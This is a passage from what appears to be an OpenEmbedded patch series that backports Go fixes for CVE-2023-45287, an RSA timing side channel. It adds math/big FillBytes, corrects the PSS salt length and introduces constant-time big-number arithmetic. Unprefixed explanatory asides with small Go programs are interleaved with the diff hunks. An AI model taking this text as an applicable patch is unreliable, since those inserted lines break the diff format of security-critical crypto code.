++ x.abs.bytes(buf)
++ return buf
++}
++
+ // BitLen returns the length of the absolute value of x in bits.
+ // The bit length of 0 is 0.
+ func (x *Int) BitLen() int {
+diff --git a/src/math/big/int_test.go b/src/math/big/int_test.go
+index e3a1587b3f0ad..3c8557323a032 100644
+--- a/src/math/big/int_test.go
++++ b/src/math/big/int_test.go
+@@ -1840,3 +1840,57 @@ func BenchmarkDiv(b *testing.B) {
+ })
+ }
+ }
++
++func TestFillBytes(t *testing.T) {
++ checkResult := func(t *testing.T, buf []byte, want *Int) {
++ t.Helper()
++ got := new(Int).SetBytes(buf)
++ if got.CmpAbs(want) != 0 {
++ t.Errorf("got 0x%x, want 0x%x: %x", got, want, buf)
++ }
++ }
++ panics := func(f func()) (panic bool) {
++ defer func() { panic = recover() != nil }()
++ f()
++ return
++ }
++
++ for _, n := range []string{
++ "0",
++ "1000",
++ "0xffffffff",
++ "-0xffffffff",
++ "0xffffffffffffffff",
++ "0x10000000000000000",
++ "0xabababababababababababababababababababababababababa",
++ "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
++ } {
++ t.Run(n, func(t *testing.T) {
++ t.Logf(n)
++ x, ok := new(Int).SetString(n, 0)
++ if !ok {
++ panic("invalid test entry")
++ }
++
++ // Perfectly sized buffer.
++ byteLen := (x.BitLen() + 7) / 8
++ buf := make([]byte, byteLen)
++ checkResult(t, x.FillBytes(buf), x)
++
++ // Way larger, checking all bytes get zeroed.
++ buf = make([]byte, 100)
++ for i := range buf {
++ buf[i] = 0xff
++ }
++ checkResult(t, x.FillBytes(buf), x)
++
++ // Too small.
++ if byteLen > 0 {
++ buf = make([]byte, byteLen-1)
++ if !panics(func() { x.FillBytes(buf) }) {
++ t.Errorf("expected panic for small buffer and value %x", x)
++ }
++ }
++ })
++ }
++}
+diff --git a/src/math/big/nat.go b/src/math/big/nat.go
+index c31ec5156b81d..6a3989bf9d82b 100644
+--- a/src/math/big/nat.go
++++ b/src/math/big/nat.go
+@@ -1476,19 +1476,26 @@ func (z nat) expNNMontgomery(x, y, m nat) nat {
+ }
+
+ // bytes writes the value of z into buf using big-endian encoding.
+-// len(buf) must be >= len(z)*_S. The value of z is encoded in the
+-// slice buf[i:]. The number i of unused bytes at the beginning of
+-// buf is returned as result.
++// The value of z is encoded in the slice buf[i:]. If the value of z
++// cannot be represented in buf, bytes panics. The number i of unused
++// bytes at the beginning of buf is returned as result.
+ func (z nat) bytes(buf []byte) (i int) {
+ i = len(buf)
+ for _, d := range z {
+ for j := 0; j < _S; j++ {
+ i--
+- buf[i] = byte(d)
++ if i >= 0 {
++ buf[i] = byte(d)
++ } else if byte(d) != 0 {
++ panic("math/big: buffer too small to fit value")
++ }
+ d >>= 8
+ }
+ }
+
++ if i < 0 {
++ i = 0
++ }
+ for i < len(buf) && buf[i] == 0 {
+ i++
+ }
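A short illustration of the difference FillBytes makes compared with Bytes, which is why the crypto call sites above can drop their hand-rolled left-padding helpers. This is plain use of the public math/big API with any toolchain that has FillBytes (or this backport applied).

package main

import (
	"fmt"
	"math/big"
)

func main() {
	x := big.NewInt(0xabcd)

	// Bytes strips leading zeros, so the output length depends on the value.
	fmt.Printf("% x\n", x.Bytes()) // ab cd

	// FillBytes writes the value right-aligned into a caller-sized buffer,
	// zero-padding on the left, which is what fixed-length encodings such as
	// RSA ciphertexts and EC private keys need.
	buf := make([]byte, 8)
	fmt.Printf("% x\n", x.FillBytes(buf)) // 00 00 00 00 00 00 ab cd
}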
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
new file mode 100644
index 0000000000..ae9fcc170c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
@@ -0,0 +1,86 @@
+From 8f676144ad7b7c91adb0c6e1ec89aaa6283c6807 Mon Sep 17 00:00:00 2001
+From: Himanshu Kishna Srivastava <28himanshu@gmail.com>
+Date: Tue, 16 Mar 2021 22:37:46 +0530
+Subject: [PATCH] crypto/rsa: fix salt length calculation with
+ PSSSaltLengthAuto
+
+When PSSSaltLengthAuto is used, the maximum salt length must equal:
+
+ (modulus_key_size - 1 + 7)/8 - hash_length - 2
+and for example, with a 4096 bit modulus key, and a SHA-1 hash,
+it should be:
+
+ (4096 -1 + 7)/8 - 20 - 2 = 490
+Previously we'd encounter this error:
+
+ crypto/rsa: key size too small for PSS signature
+
+Fixes #42741
+
+Change-Id: I18bb82c41c511d564b3f4c443f4b3a38ab010ac5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/302230
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Trust: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8f676144ad7b7c91adb0c6e1ec89aaa6283c6807]
+CVE: CVE-2023-45287 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 2 +-
+ src/crypto/rsa/pss_test.go | 20 +++++++++++++++++++-
+ 2 files changed, 20 insertions(+), 2 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index b2adbedb28fa8..814522de8181f 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -269,7 +269,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = priv.Size() - 2 - hash.Size()
++ saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index dfa8d8bb5ad02..c3a6d468497cd 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -12,7 +12,7 @@ import (
+ _ "crypto/md5"
+ "crypto/rand"
+ "crypto/sha1"
+- _ "crypto/sha256"
++ "crypto/sha256"
+ "encoding/hex"
+ "math/big"
+ "os"
+@@ -233,6 +233,24 @@ func TestPSSSigning(t *testing.T) {
+ }
+ }
+
++func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++ key, err := GenerateKey(rand.Reader, 513)
++ if err != nil {
++ t.Fatal(err)
++ }
++ digest := sha256.Sum256([]byte("message"))
++ signature, err := key.Sign(rand.Reader, digest[:], &PSSOptions{
++ SaltLength: PSSSaltLengthAuto,
++ Hash: crypto.SHA256,
++ })
++ if err != nil {
++ t.Fatal(err)
++ }
++ if len(signature) == 0 {
++ t.Fatal("empty signature returned")
++ }
++}
++
+ func bigFromHex(hex string) *big.Int {
+ n, ok := new(big.Int).SetString(hex, 16)
+ if !ok {
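A worked check of the corrected formula from the commit message above, assuming only the arithmetic stated there; maxPSSSaltLen is an invented local helper, not part of crypto/rsa.

package main

import "fmt"

// maxPSSSaltLen reproduces the corrected calculation: the encoded-message
// length is derived from BitLen()-1, not from the full modulus size in bytes.
func maxPSSSaltLen(modulusBits, hashLen int) int {
	return (modulusBits-1+7)/8 - hashLen - 2
}

func main() {
	fmt.Println(maxPSSSaltLen(4096, 20)) // 490: the SHA-1 / 4096-bit example from the message
	fmt.Println(maxPSSSaltLen(513, 32))  // 30: the SHA-256 / 513-bit key used by the new test
}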
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
new file mode 100644
index 0000000000..90a74255db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
@@ -0,0 +1,1697 @@
+From 8a81fdf165facdcefa06531de5af98a4db343035 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?L=C3=BAc=C3=A1s=20Meier?= <cronokirby@gmail.com>
+Date: Tue, 8 Jun 2021 21:36:06 +0200
+Subject: [PATCH] crypto/rsa: replace big.Int for encryption and decryption
+
+Infamously, big.Int does not provide constant-time arithmetic, making
+its use in cryptographic code quite tricky. RSA uses big.Int
+pervasively, in its public API, for key generation, precomputation, and
+for encryption and decryption. This is a known problem. One mitigation,
+blinding, is already in place during decryption. This helps mitigate the
+very leaky exponentiation operation. Because big.Int is fundamentally
+not constant-time, it's unfortunately difficult to guarantee that
+mitigations like these are completely effective.
+
+This patch removes the use of big.Int for encryption and decryption,
+replacing it with an internal nat type instead. Signing and verification
+are also affected, because they depend on encryption and decryption.
+
+Overall, this patch degrades performance by 55% for private key
+operations, and 4-5x for (much faster) public key operations.
+(Signatures do both, so the slowdown is worse than decryption.)
+
+name old time/op new time/op delta
+DecryptPKCS1v15/2048-8 1.50ms ± 0% 2.34ms ± 0% +56.44% (p=0.000 n=8+10)
+DecryptPKCS1v15/3072-8 4.40ms ± 0% 6.79ms ± 0% +54.33% (p=0.000 n=10+9)
+DecryptPKCS1v15/4096-8 9.31ms ± 0% 15.14ms ± 0% +62.60% (p=0.000 n=10+10)
+EncryptPKCS1v15/2048-8 8.16µs ± 0% 355.58µs ± 0% +4258.90% (p=0.000 n=10+9)
+DecryptOAEP/2048-8 1.50ms ± 0% 2.34ms ± 0% +55.68% (p=0.000 n=10+9)
+EncryptOAEP/2048-8 8.51µs ± 0% 355.95µs ± 0% +4082.75% (p=0.000 n=10+9)
+SignPKCS1v15/2048-8 1.51ms ± 0% 2.69ms ± 0% +77.94% (p=0.000 n=10+10)
+VerifyPKCS1v15/2048-8 7.25µs ± 0% 354.34µs ± 0% +4789.52% (p=0.000 n=9+9)
+SignPSS/2048-8 1.51ms ± 0% 2.70ms ± 0% +78.80% (p=0.000 n=9+10)
+VerifyPSS/2048-8 8.27µs ± 1% 355.65µs ± 0% +4199.39% (p=0.000 n=10+10)
+
+Keep in mind that this is without any assembly at all, and that further
+improvements are likely possible. I think having a review of the logic
+and the cryptography would be a good idea at this stage, before we
+complicate the code too much through optimization.
+
+The bulk of the work is in nat.go. This introduces two new types: nat,
+representing natural numbers, and modulus, representing moduli used in
+modular arithmetic.
+
+A nat has an "announced size", which may be larger than its "true size",
+the number of bits needed to represent this number. Operations on a nat
+will only ever leak its announced size, never its true size, or other
+information about its value. The size of a nat is always clear based on
+how its value is set. For example, x.mod(y, m) will make the announced
+size of x match that of m, since x is reduced modulo m.
+
+Operations assume that the announced size of the operands match what's
+expected (with a few exceptions). For example, x.modAdd(y, m) assumes
+that x and y have the same announced size as m, and that they're reduced
+modulo m.
+
+Nats are represented over unsaturated bits.UintSize - 1 bit limbs. This
+means that we can't reuse the assembly routines for big.Int, which use
+saturated bits.UintSize limbs. The advantage of unsaturated limbs is
+that it makes Montgomery multiplication faster, by needing fewer
+registers in a hot loop. This makes exponentiation faster, which
+consists of many Montgomery multiplications.
+
+Moduli use nat internally. Unlike nat, the true size of a modulus always
+matches its announced size. When creating a modulus, any zero padding is
+removed. Moduli will also precompute constants when created, which is
+another reason why having a separate type is desirable.
+
+Updates #20654
+
+Co-authored-by: Filippo Valsorda <filippo@golang.org>
+Change-Id: I73b61f87d58ab912e80a9644e255d552cbadcced
+Reviewed-on: https://go-review.googlesource.com/c/go/+/326012
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Joedian Reid <joedian@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8a81fdf165facdcefa06531de5af98a4db343035]
+CVE: CVE-2023-45287
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/example_test.go | 21 +-
+ src/crypto/rsa/nat.go | 626 +++++++++++++++++++++++++++++++++
+ src/crypto/rsa/nat_test.go | 384 ++++++++++++++++++++
+ src/crypto/rsa/pkcs1v15.go | 47 +--
+ src/crypto/rsa/pss.go | 50 ++-
+ src/crypto/rsa/pss_test.go | 10 +-
+ src/crypto/rsa/rsa.go | 174 ++++-----
+ 7 files changed, 1143 insertions(+), 169 deletions(-)
+ create mode 100644 src/crypto/rsa/nat.go
+ create mode 100644 src/crypto/rsa/nat_test.go
+
+diff --git a/src/crypto/rsa/example_test.go b/src/crypto/rsa/example_test.go
+index 1435b70..1963609 100644
+--- a/src/crypto/rsa/example_test.go
++++ b/src/crypto/rsa/example_test.go
+@@ -12,7 +12,6 @@ import (
+ "crypto/sha256"
+ "encoding/hex"
+ "fmt"
+- "io"
+ "os"
+ )
+
+@@ -36,21 +35,17 @@ import (
+ // a buffer that contains a random key. Thus, if the RSA result isn't
+ // well-formed, the implementation uses a random key in constant time.
+ func ExampleDecryptPKCS1v15SessionKey() {
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+ // The hybrid scheme should use at least a 16-byte symmetric key. Here
+ // we read the random key that will be used if the RSA decryption isn't
+ // well-formed.
+ key := make([]byte, 32)
+- if _, err := io.ReadFull(rng, key); err != nil {
++ if _, err := rand.Read(key); err != nil {
+ panic("RNG failure")
+ }
+
+ rsaCiphertext, _ := hex.DecodeString("aabbccddeeff")
+
+- if err := DecryptPKCS1v15SessionKey(rng, rsaPrivateKey, rsaCiphertext, key); err != nil {
++ if err := DecryptPKCS1v15SessionKey(nil, rsaPrivateKey, rsaCiphertext, key); err != nil {
+ // Any errors that result will be “public” – meaning that they
+ // can be determined without any secret information. (For
+ // instance, if the length of key is impossible given the RSA
+@@ -86,10 +81,6 @@ func ExampleDecryptPKCS1v15SessionKey() {
+ }
+
+ func ExampleSignPKCS1v15() {
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+ message := []byte("message to be signed")
+
+ // Only small messages can be signed directly; thus the hash of a
+@@ -99,7 +90,7 @@ func ExampleSignPKCS1v15() {
+ // of writing (2016).
+ hashed := sha256.Sum256(message)
+
+- signature, err := SignPKCS1v15(rng, rsaPrivateKey, crypto.SHA256, hashed[:])
++ signature, err := SignPKCS1v15(nil, rsaPrivateKey, crypto.SHA256, hashed[:])
+ if err != nil {
+ fmt.Fprintf(os.Stderr, "Error from signing: %s\n", err)
+ return
+@@ -151,11 +142,7 @@ func ExampleDecryptOAEP() {
+ ciphertext, _ := hex.DecodeString("4d1ee10e8f286390258c51a5e80802844c3e6358ad6690b7285218a7c7ed7fc3a4c7b950fbd04d4b0239cc060dcc7065ca6f84c1756deb71ca5685cadbb82be025e16449b905c568a19c088a1abfad54bf7ecc67a7df39943ec511091a34c0f2348d04e058fcff4d55644de3cd1d580791d4524b92f3e91695582e6e340a1c50b6c6d78e80b4e42c5b4d45e479b492de42bbd39cc642ebb80226bb5200020d501b24a37bcc2ec7f34e596b4fd6b063de4858dbf5a4e3dd18e262eda0ec2d19dbd8e890d672b63d368768360b20c0b6b8592a438fa275e5fa7f60bef0dd39673fd3989cc54d2cb80c08fcd19dacbc265ee1c6014616b0e04ea0328c2a04e73460")
+ label := []byte("orders")
+
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+- plaintext, err := DecryptOAEP(sha256.New(), rng, test2048Key, ciphertext, label)
++ plaintext, err := DecryptOAEP(sha256.New(), nil, test2048Key, ciphertext, label)
+ if err != nil {
+ fmt.Fprintf(os.Stderr, "Error from decryption: %s\n", err)
+ return
+diff --git a/src/crypto/rsa/nat.go b/src/crypto/rsa/nat.go
+new file mode 100644
+index 0000000..da521c2
+--- /dev/null
++++ b/src/crypto/rsa/nat.go
+@@ -0,0 +1,626 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++ "math/big"
++ "math/bits"
++)
++
++const (
++ // _W is the number of bits we use for our limbs.
++ _W = bits.UintSize - 1
++ // _MASK selects _W bits from a full machine word.
++ _MASK = (1 << _W) - 1
++)
++
++// choice represents a constant-time boolean. The value of choice is always
++// either 1 or 0. We use an int instead of bool in order to make decisions in
++// constant time by turning it into a mask.
++type choice uint
++
++func not(c choice) choice { return 1 ^ c }
++
++const yes = choice(1)
++const no = choice(0)
++
++// ctSelect returns x if on == 1, and y if on == 0. The execution time of this
++// function does not depend on its inputs. If on is any value besides 1 or 0,
++// the result is undefined.
++func ctSelect(on choice, x, y uint) uint {
++ // When on == 1, mask is 0b111..., otherwise mask is 0b000...
++ mask := -uint(on)
++ // When mask is all zeros, we just have y, otherwise, y cancels with itself.
++ return y ^ (mask & (y ^ x))
++}
++
++// ctEq returns 1 if x == y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctEq(x, y uint) choice {
++ // If x != y, then either x - y or y - x will generate a carry.
++ _, c1 := bits.Sub(x, y, 0)
++ _, c2 := bits.Sub(y, x, 0)
++ return not(choice(c1 | c2))
++}
++
++// ctGeq returns 1 if x >= y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctGeq(x, y uint) choice {
++ // If x < y, then x - y generates a carry.
++ _, carry := bits.Sub(x, y, 0)
++ return not(choice(carry))
++}
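// Aside (illustrative only, not part of the upstream patch): the helpers
// above use two standard constant-time idioms, select-by-mask and comparison
// via the borrow bit of bits.Sub. A tiny standalone check of both:
package main

import (
	"fmt"
	"math/bits"
)

func main() {
	x, y := uint(0xAAAA), uint(0x5555)
	for _, on := range []uint{0, 1} {
		mask := -on                 // all zeros when on == 0, all ones when on == 1
		got := y ^ (mask & (y ^ x)) // y when on == 0, x when on == 1
		fmt.Printf("on=%d -> %#x\n", on, got)
	}
	// x >= y exactly when x - y produces no borrow.
	_, borrow := bits.Sub(uint(5), uint(3), 0)
	fmt.Println("5 >= 3:", borrow == 0) // true
	_, borrow = bits.Sub(uint(3), uint(5), 0)
	fmt.Println("3 >= 5:", borrow == 0) // false
}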
++
++// nat represents an arbitrary natural number
++//
++// Each nat has an announced length, which is the number of limbs it has stored.
++// Operations on this number are allowed to leak this length, but will not leak
++// any information about the values contained in those limbs.
++type nat struct {
++ // limbs is a little-endian representation in base 2^W with
++ // W = bits.UintSize - 1. The top bit is always unset between operations.
++ //
++ // The top bit is left unset to optimize Montgomery multiplication, in the
++ // inner loop of exponentiation. Using fully saturated limbs would leave us
++ // working with 129-bit numbers on 64-bit platforms, wasting a lot of space,
++ // and thus time.
++ limbs []uint
++}
++
++// expand expands x to n limbs, leaving its value unchanged.
++func (x *nat) expand(n int) *nat {
++ for len(x.limbs) > n {
++ if x.limbs[len(x.limbs)-1] != 0 {
++ panic("rsa: internal error: shrinking nat")
++ }
++ x.limbs = x.limbs[:len(x.limbs)-1]
++ }
++ if cap(x.limbs) < n {
++ newLimbs := make([]uint, n)
++ copy(newLimbs, x.limbs)
++ x.limbs = newLimbs
++ return x
++ }
++ extraLimbs := x.limbs[len(x.limbs):n]
++ for i := range extraLimbs {
++ extraLimbs[i] = 0
++ }
++ x.limbs = x.limbs[:n]
++ return x
++}
++
++// reset returns a zero nat of n limbs, reusing x's storage if n <= cap(x.limbs).
++func (x *nat) reset(n int) *nat {
++ if cap(x.limbs) < n {
++ x.limbs = make([]uint, n)
++ return x
++ }
++ for i := range x.limbs {
++ x.limbs[i] = 0
++ }
++ x.limbs = x.limbs[:n]
++ return x
++}
++
++// clone returns a new nat, with the same value and announced length as x.
++func (x *nat) clone() *nat {
++ out := &nat{make([]uint, len(x.limbs))}
++ copy(out.limbs, x.limbs)
++ return out
++}
++
++// natFromBig creates a new natural number from a big.Int.
++//
++// The announced length of the resulting nat is based on the actual bit size of
++// the input, ignoring leading zeroes.
++func natFromBig(x *big.Int) *nat {
++ xLimbs := x.Bits()
++ bitSize := bigBitLen(x)
++ requiredLimbs := (bitSize + _W - 1) / _W
++
++ out := &nat{make([]uint, requiredLimbs)}
++ outI := 0
++ shift := 0
++ for i := range xLimbs {
++ xi := uint(xLimbs[i])
++ out.limbs[outI] |= (xi << shift) & _MASK
++ outI++
++ if outI == requiredLimbs {
++ return out
++ }
++ out.limbs[outI] = xi >> (_W - shift)
++ shift++ // this assumes bits.UintSize - _W = 1
++ if shift == _W {
++ shift = 0
++ outI++
++ }
++ }
++ return out
++}
++
++// fillBytes sets bytes to x as a zero-extended big-endian byte slice.
++//
++// If bytes is not long enough to contain the number or at least len(x.limbs)-1
++// limbs, or has zero length, fillBytes will panic.
++func (x *nat) fillBytes(bytes []byte) []byte {
++ if len(bytes) == 0 {
++ panic("nat: fillBytes invoked with too small buffer")
++ }
++ for i := range bytes {
++ bytes[i] = 0
++ }
++ shift := 0
++ outI := len(bytes) - 1
++ for i, limb := range x.limbs {
++ remainingBits := _W
++ for remainingBits >= 8 {
++ bytes[outI] |= byte(limb) << shift
++ consumed := 8 - shift
++ limb >>= consumed
++ remainingBits -= consumed
++ shift = 0
++ outI--
++ if outI < 0 {
++ if limb != 0 || i < len(x.limbs)-1 {
++ panic("nat: fillBytes invoked with too small buffer")
++ }
++ return bytes
++ }
++ }
++ bytes[outI] = byte(limb)
++ shift = remainingBits
++ }
++ return bytes
++}
++
++// natFromBytes converts a slice of big-endian bytes into a nat.
++//
++// The announced length of the output depends on the length of bytes. Unlike
++// big.Int, creating a nat will not remove leading zeros.
++func natFromBytes(bytes []byte) *nat {
++ bitSize := len(bytes) * 8
++ requiredLimbs := (bitSize + _W - 1) / _W
++
++ out := &nat{make([]uint, requiredLimbs)}
++ outI := 0
++ shift := 0
++ for i := len(bytes) - 1; i >= 0; i-- {
++ bi := bytes[i]
++ out.limbs[outI] |= uint(bi) << shift
++ shift += 8
++ if shift >= _W {
++ shift -= _W
++ out.limbs[outI] &= _MASK
++ outI++
++ if shift > 0 {
++ out.limbs[outI] = uint(bi) >> (8 - shift)
++ }
++ }
++ }
++ return out
++}
++
++// cmpEq returns 1 if x == y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpEq(y *nat) choice {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ equal := yes
++ for i := 0; i < size; i++ {
++ equal &= ctEq(xLimbs[i], yLimbs[i])
++ }
++ return equal
++}
++
++// cmpGeq returns 1 if x >= y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpGeq(y *nat) choice {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ var c uint
++ for i := 0; i < size; i++ {
++ c = (xLimbs[i] - yLimbs[i] - c) >> _W
++ }
++ // If there was a carry, then subtracting y underflowed, so
++ // x is not greater than or equal to y.
++ return not(choice(c))
++}
++
++// assign sets x <- y if on == 1, and does nothing otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) assign(on choice, y *nat) *nat {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ xLimbs[i] = ctSelect(on, yLimbs[i], xLimbs[i])
++ }
++ return x
++}
++
++// add computes x += y if on == 1, and does nothing otherwise. It returns the
++// carry of the addition regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) add(on choice, y *nat) (c uint) {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ res := xLimbs[i] + yLimbs[i] + c
++ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++ c = res >> _W
++ }
++ return
++}
++
++// sub computes x -= y if on == 1, and does nothing otherwise. It returns the
++// borrow of the subtraction regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) sub(on choice, y *nat) (c uint) {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ res := xLimbs[i] - yLimbs[i] - c
++ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++ c = res >> _W
++ }
++ return
++}
++
++// modulus is used for modular arithmetic, precomputing relevant constants.
++//
++// Moduli are assumed to be odd numbers. Moduli can also leak the exact
++// number of bits needed to store their value, and are stored without padding.
++//
++// Their actual value is still kept secret.
++type modulus struct {
++ // The underlying natural number for this modulus.
++ //
++ // This will be stored without any padding, and shouldn't alias with any
++ // other natural number being used.
++ nat *nat
++ leading int // number of leading zeros in the modulus
++ m0inv uint // -nat.limbs[0]⁻¹ mod _W
++}
++
++// minusInverseModW computes -x⁻¹ mod _W with x odd.
++//
++// This operation is used to precompute a constant involved in Montgomery
++// multiplication.
++func minusInverseModW(x uint) uint {
++ // Every iteration of this loop doubles the least-significant bits of
++ // correct inverse in y. The first three bits are already correct (1⁻¹ = 1,
++ // 3⁻¹ = 3, 5⁻¹ = 5, and 7⁻¹ = 7 mod 8), so doubling five times is enough
++ // for 61 bits (and wastes only one iteration for 31 bits).
++ //
++ // See https://crypto.stackexchange.com/a/47496.
++ y := x
++ for i := 0; i < 5; i++ {
++ y = y * (2 - x*y)
++ }
++ return (1 << _W) - (y & _MASK)
++}
++
++// modulusFromNat creates a new modulus from a nat.
++//
++// The nat should be odd, nonzero, and the number of significant bits in the
++// number should be leakable. The nat shouldn't be reused.
++func modulusFromNat(nat *nat) *modulus {
++ m := &modulus{}
++ m.nat = nat
++ size := len(m.nat.limbs)
++ for m.nat.limbs[size-1] == 0 {
++ size--
++ }
++ m.nat.limbs = m.nat.limbs[:size]
++ m.leading = _W - bitLen(m.nat.limbs[size-1])
++ m.m0inv = minusInverseModW(m.nat.limbs[0])
++ return m
++}
++
++// bitLen is a version of bits.Len that only leaks the bit length of n, but not
++// its value. bits.Len and bits.LeadingZeros use a lookup table for the
++// low-order bits on some architectures.
++func bitLen(n uint) int {
++ var len int
++ // We assume, here and elsewhere, that comparison to zero is constant time
++ // with respect to different non-zero values.
++ for n != 0 {
++ len++
++ n >>= 1
++ }
++ return len
++}
++
++// bigBitLen is a version of big.Int.BitLen that only leaks the bit length of x,
++// but not its value. big.Int.BitLen uses bits.Len.
++func bigBitLen(x *big.Int) int {
++ xLimbs := x.Bits()
++ fullLimbs := len(xLimbs) - 1
++ topLimb := uint(xLimbs[len(xLimbs)-1])
++ return fullLimbs*bits.UintSize + bitLen(topLimb)
++}
++
++// modulusSize returns the size of m in bytes.
++func modulusSize(m *modulus) int {
++ bits := len(m.nat.limbs)*_W - int(m.leading)
++ return (bits + 7) / 8
++}
++
++// shiftIn calculates x = x << _W + y mod m.
++//
++// This assumes that x is already reduced mod m, and that y < 2^_W.
++func (x *nat) shiftIn(y uint, m *modulus) *nat {
++ d := new(nat).resetFor(m)
++
++ // Eliminate bounds checks in the loop.
++ size := len(m.nat.limbs)
++ xLimbs := x.limbs[:size]
++ dLimbs := d.limbs[:size]
++ mLimbs := m.nat.limbs[:size]
++
++ // Each iteration of this loop computes x = 2x + b mod m, where b is a bit
++ // from y. Effectively, it left-shifts x and adds y one bit at a time,
++ // reducing it every time.
++ //
++ // To do the reduction, each iteration computes both 2x + b and 2x + b - m.
++ // The next iteration (and finally the return line) will use either result
++ // based on whether the subtraction underflowed.
++ needSubtraction := no
++ for i := _W - 1; i >= 0; i-- {
++ carry := (y >> i) & 1
++ var borrow uint
++ for i := 0; i < size; i++ {
++ l := ctSelect(needSubtraction, dLimbs[i], xLimbs[i])
++
++ res := l<<1 + carry
++ xLimbs[i] = res & _MASK
++ carry = res >> _W
++
++ res = xLimbs[i] - mLimbs[i] - borrow
++ dLimbs[i] = res & _MASK
++ borrow = res >> _W
++ }
++ // See modAdd for how carry (aka overflow), borrow (aka underflow), and
++ // needSubtraction relate.
++ needSubtraction = ctEq(carry, borrow)
++ }
++ return x.assign(needSubtraction, d)
++}
++
++// mod calculates out = x mod m.
++//
++// This works regardless of how large the value of x is.
++//
++// The output will be resized to the size of m and overwritten.
++func (out *nat) mod(x *nat, m *modulus) *nat {
++ out.resetFor(m)
++ // Working our way from the most significant to the least significant limb,
++ // we can insert each limb at the least significant position, shifting all
++ // previous limbs left by _W. This way each limb will get shifted by the
++ // correct number of bits. We can insert at least N - 1 limbs without
++ // overflowing m. After that, we need to reduce every time we shift.
++ i := len(x.limbs) - 1
++ // For the first N - 1 limbs we can skip the actual shifting and position
++ // them at the shifted position, which starts at min(N - 2, i).
++ start := len(m.nat.limbs) - 2
++ if i < start {
++ start = i
++ }
++ for j := start; j >= 0; j-- {
++ out.limbs[j] = x.limbs[i]
++ i--
++ }
++ // We shift in the remaining limbs, reducing modulo m each time.
++ for i >= 0 {
++ out.shiftIn(x.limbs[i], m)
++ i--
++ }
++ return out
++}
++
++// expandFor ensures out has the right size to work with operations modulo m.
++//
++// This assumes that out has as many or fewer limbs than m, or that the extra
++// limbs are all zero (which may happen when decoding a value that has leading
++// zeroes in its bytes representation that spill over the limb threshold).
++func (out *nat) expandFor(m *modulus) *nat {
++ return out.expand(len(m.nat.limbs))
++}
++
++// resetFor ensures out has the right size to work with operations modulo m.
++//
++// out is zeroed and may start at any size.
++func (out *nat) resetFor(m *modulus) *nat {
++ return out.reset(len(m.nat.limbs))
++}
++
++// modSub computes x = x - y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modSub(y *nat, m *modulus) *nat {
++ underflow := x.sub(yes, y)
++ // If the subtraction underflowed, add m.
++ x.add(choice(underflow), m.nat)
++ return x
++}
++
